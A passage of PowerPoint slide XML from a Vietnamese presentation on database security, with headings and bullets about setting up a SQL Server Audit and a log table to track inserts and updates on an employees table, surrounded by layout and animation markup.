                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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62A624EE-FBA4-1720-F8DE-88C0BA0DF7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3381486"/>
            <a:ext cx="15316200" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo Server Audit để giám sát các hoạt động Update và Insert trên bảng employees bởi người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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96E6B241-D038-D2A9-AE3F-AF2C97F747B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="848912" y="3941826"/>
            <a:ext cx="8609133" cy="5087874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9178DA98-2EA8-BF90-C3E5-452EA2BEFF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9353549" y="4102902"/>
            <a:ext cx="8146274" cy="5100875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347550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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="11"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9FA8F7-7FFA-D874-CA37-B54AAE05B628}"/>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EDFBFF45-BAA2-5662-57F2-0CB26509FAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{319A1650-623D-85B8-D0A9-D35D0F00E508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F06F3480-C902-9BC1-C8C4-E929D7F56FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698264"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53CF11C8-5B9A-6AA6-4F0F-DF8B9C081883}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEBCF595-6F95-22A9-1308-F145A2512F82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5E8BB7-159C-5DD5-AEF3-BA2716ACE15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250175" y="2741532"/>
            <a:ext cx="11049000" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ải pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea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49934895-F14D-3BC9-81EC-9EF88F6A38E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231125" y="3232466"/>
            <a:ext cx="12811546" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo bảng để ghi lại các log trong bảng employees</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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2C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="9237958"/>
            <a:ext cx="2743200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo bảng ghi log</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E52E683D-102A-5367-CB4D-7114CA2735B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3963268" y="3925407"/>
            <a:ext cx="10056663" cy="5058563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1595579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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="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9FA8F7-7FFA-D874-CA37-B54AAE05B628}"/>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EDFBFF45-BAA2-5662-57F2-0CB26509FAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{319A1650-623D-85B8-D0A9-D35D0F00E508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F06F3480-C902-9BC1-C8C4-E929D7F56FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698264"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53CF11C8-5B9A-6AA6-4F0F-DF8B9C081883}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEBCF595-6F95-22A9-1308-F145A2512F82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
